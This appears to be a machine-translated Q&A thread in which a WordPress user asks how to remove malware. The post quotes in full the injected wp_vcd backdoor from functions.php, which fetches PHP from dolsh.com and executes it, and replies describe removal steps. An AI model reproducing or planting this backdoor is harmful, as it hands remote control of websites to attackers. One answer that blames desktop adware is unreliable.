2017-09-05 239 views
2

我不知道这是否是每次当我点击我网站上的一些链接时onlickads 代码它重定向我onclickads.com链接。WordPress网站已将我的链接重定向到onclickads网站

每次我删除我的主题这段代码的functions.php它会一次又一次地产生这种代码..当我检查的主题函数不包含这些代码的原始文件。

<?php 

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb')) 
{ 
    $div_code_name="wp_vcd"; 
    switch ($_REQUEST['action']) 
    { 
     case 'change_domain'; 

     if (isset($_REQUEST['newdomain'])) 
     { 

      if (!empty($_REQUEST['newdomain'])) 
      { 
       if ($file = @file_get_contents(__FILE__)) 
       { 
        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain)) 
        { 
         $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); 
         @file_put_contents(__FILE__, $file); 
         print "true"; 
        } 
       } 
      } 
     } 
     break; 
     default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; 
    } 
    die(""); 
} 

if (! function_exists('w1p_te1mp_se1tup')) { 
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; 
    if (! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { 
     if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path)) 
     { 

      function w1p_te1mp_se1tup($phpCode) { 
       $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup"); 
       $handle = fopen($tmpfname, "w+"); 
       fwrite($handle, "<?php\n" . $phpCode); 
       fclose($handle); 
       include $tmpfname; 
       unlink($tmpfname); 
       return get_defined_vars(); 
      } 
      extract(w1p_te1mp_se1tup($tmpcontent)); 
     } 
    } 
} 

?> 

任何一个可以建议做什么或TUTS删除我的网站上的恶意软件,

谢谢。

+0

如果它的每一次再次发生,我建议你做一个干净的安装你的WordPress让黑客从你的安装目录 – Ferrybig

+0

感谢您的建议,也许生病的做到这一点,我别无选择。 :( – GravityCode

回答

3

这onclickads.com重定向通常被安装在计算机上的广告软件引起的。这些广告软件程序与您从互联网下载的其他免费软件捆绑在一起。

可能是你并不需要安装一个新的版本,你可以从你的网站通过下面的步骤删除此类型警告的。从文件

1)删除不需要的代码:

要删除onclickads.com重定向,请按照下列步骤。

2)卸载从Windows

恶意程序

3)系统上使用的安全软件,还可以使用安全插件在WordPress像Anti-spamWordfence

下面这个步骤仍然之后,没有什么工作那么你就可以安装全新的版本并安装新的安全插件以避免在将来使用时出现黑客行为。

希望这对你有帮助。谢谢。

+0

太感谢你了,我只是卸载我叫Cyber​​Ghost VPN现在Onclickads.com走了,但还是上面的代码显示了在停用。 – GravityCode

+0

即使我所有的插头感谢您的Wordfence是帮助我的所有来解决这个问题..在我的wp上有一个未知的文件 - 包括wp_vcd.php和class-wp.php,这是关于post.php上的所有和一些功能的罪魁祸首..现在我的网站运行正常:D – GravityCode

+0

伟大的工作@GravityCode: - ) –

0

要完全删除代码,如果你使用的是子主题,你也必须从你的父主题的同时

+0

这不是一个有用的答案,更适合评论。 – Verv

1

我做了什么来解决问题删除:

  1. wp-include目录,删除wp-vcd.phpclass.wp.php文件
  2. wp-include目录中,打开post.php和删除第一php标签由Malware
  3. 添加
  4. 开放的主题的functions.php文件,并删除上面的代码
相关问题